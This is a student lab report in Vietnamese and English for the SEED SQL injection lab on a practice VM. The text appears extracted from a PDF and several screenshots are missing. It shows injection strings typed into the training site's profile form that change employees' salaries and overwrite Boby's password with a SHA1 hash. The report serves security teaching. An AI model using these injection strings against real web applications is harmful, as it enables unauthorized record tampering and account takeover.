SQL InjectionSQL injection is a code injection technique that exploits the vulnerabilities in the interface between web applications and database servers.. The vulnerability is present w
Trang 1TRƯỜNG ĐẠI HỌC SƯ PHẠM KỸ THUÂT TP.HỒ CH MINH
KHOA CÔNG NGHỆ THÔNG TIN
BÁO CÁO BÀI THỰC HÀNH(LAB)
Môn học: AN TOÀN THÔNG TIN
Mã lớp học phần: INSE330380_22_1_07
GVHD:TS Huỳnh Nguyên Chính
Sinh viên thực hiện: Mai Bảo Huy - 20110649
TP Hồ Chí Minh, tháng 09 năm 2022
Trang 2Lab 5 SQL Injec tion
SQL injection is a code injection technique that exploits the vulnerabilities in the interface between web applications and database servers The vulnerability is present when user’s inputs are not correctly checked within the web applications before being sent to the back-end database servers
Submission:
You will compose a lab report that documents each step you take, including screenshots to illustrate the effects of commands you type, and describing your observations Simply attaching code without any explanation will not receive credits
Prepare:
- Pre-built Ubuntu VM (download from the SEED Website)
LAB GUIDE:
1 Review the lab environment
#vi /etc/host
Trang 32. Get Familiar with SQL Statements
Trang 5information of the employee Alice Please provide the screenshot of your results mysql> describe credential;
Trang 6Mysql> select EID, Nam, Salary, Password from credential;
3. SQL Injection Attack on SELECT Statement
We will use the login page from www.SEEDLabSQLInjection.com for this task
Truy cập vào web seedlabsqlinjection.com
Trang 7', salary=90000 where Name ='Alice';#
Trang 9', salary=90000 where Name =Boby;#
Ta thấy lương của Boby đã trở thành 1 dolar
Trang 10Dùng terminator để mã hóa mật khẩu theo sha1
$ echo -n 'abcxyz' | openssl sha1
Ta có mật khẩu sau đã được mã hóa:
0e3bbd26f46012ccec4776d171f314a00c022d98
Tiếp đó
Sau đó chọn Login
Tiếp đó chọn Edit ProFile
', password='0e3bbd26f46012ccec4776d171f314a00c022d98' where Name='Boby' ; #
Trang 11Sau đó trở lại terminal và gõ lệnh
mysql> select Name, password from credential;